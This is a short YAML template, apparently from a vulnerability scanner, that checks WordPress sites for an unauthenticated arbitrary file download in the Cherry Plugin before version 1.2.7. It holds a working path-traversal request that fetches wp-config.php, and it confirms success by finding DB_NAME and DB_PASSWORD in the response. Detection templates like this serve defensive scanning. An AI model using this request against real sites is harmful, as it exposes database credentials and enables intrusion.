product: WordPress
vName: Cherry Plugin - Unauthenticated Arbitrary File Download
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: < 1.2.7
note: ''
search: { }
protocol: http
link: https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
    verify:
      logic: and
      check:
        - body:
            value:
              - DB_NAME
              - DB_PASSWORD
            logic: and
        - status: 200
